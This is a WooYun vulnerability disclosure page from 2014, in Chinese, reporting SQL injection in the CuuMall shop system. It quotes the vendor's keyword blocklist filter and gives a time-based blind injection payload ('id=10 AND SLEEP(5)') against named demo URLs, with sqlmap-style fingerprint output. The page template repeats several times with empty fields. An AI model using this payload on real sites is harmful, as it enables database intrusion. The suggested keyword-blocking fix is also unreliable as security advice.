CuuMall商城系统设计缺陷整站注射 | wooyun-2014-079364| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079364

漏洞标题：CuuMall商城系统设计缺陷整站注射

漏洞作者： geekfree

提交时间：2014-10-16 12:49

修复时间：2014-12-30 14:44

公开时间：2014-12-30 14:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-16：细节已通知厂商并且等待厂商处理中
2014-10-21：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2014-12-15：细节向核心白帽子及相关领域专家公开
2014-12-25：细节向普通白帽子公开
2015-01-04：细节向实习白帽子公开
2014-12-30：细节向公众公开

简要描述：

CuuMall商城系统设计缺陷整站注射

详细说明：

http://demo.cuumall.com/index.php/home/detail/index?id=323
http://demo.cuumall.com/index.php/home/new/cxview/id/7
系统sql注入过滤：

public function inject_checksql( )
{
        $bad_str = "select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile|mid|script";
        $bad_Array = explode( "|", $bad_str );
        foreach ( $bad_Array as $bad_a )
        {
                foreach ( $_GET as $g )
                {
                        if ( 0 < substr_count( strtolower( $g ), $bad_a ) )
                        {
                                                        $this->assign( "waitSecond", 3 );
                                                        $this->assign( "msgTitle", "非法注入" );
                                                        $this->assign( "jumpUrl", "__APP__" );
                                                        $this->error( "请不要进行非法注入" );
                                                        exit( );
                                                        break;
                        }
                }
        }
        foreach ( $bad_Array as $bad_a )
        {
                foreach ( $_POST as $p )
                {
                        if ( 0 < substr_count( strtolower( $p ), $bad_a ) )
                        {
                                                        $this->assign( "waitSecond", 3 );
                                                        $this->assign( "msgTitle", "非法注入" );
                                                        $this->assign( "jumpUrl", "__APP__" );
                                                        $this->error( "请不要进行非法注入" );
                                                        exit( );
                                                        break;
                        }
                }
        }
        foreach ( $bad_Array as $bad_a )
        {
                foreach ( $_COOKIE as $co )
                {
                        if ( 0 < substr_count( strtolower( $co ), $bad_a ) )
                        {
                                                        $this->assign( "waitSecond", 3 );
                                                        $this->assign( "msgTitle", "非法注入" );
                                                        $this->assign( "jumpUrl", "__APP__" );
                                                        $this->error( "请不要进行非法注入" );
                                                        exit( );
                                                        break;
                        }
                }
        }
        }

明显忽略了盲注。。。。

漏洞证明：

Place: GET
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=10 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
back-end DBMS: MySQL 5.0.11

修复方案：

限制关键词:and or sleep

版权声明：转载请注明来源 geekfree@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-12-30 14:44

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079364

漏洞标题：CuuMall商城系统设计缺陷整站注射

相关厂商：cuumall.com

漏洞作者： geekfree

提交时间：2014-10-16 12:49

修复时间：2014-12-30 14:44

公开时间：2014-12-30 14:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 geekfree@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079364

漏洞标题：CuuMall商城系统设计缺陷整站注射

相关厂商：cuumall.com

漏洞作者： geekfree

提交时间：2014-10-16 12:49

修复时间：2014-12-30 14:44

公开时间：2014-12-30 14:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-079364"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 geekfree@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：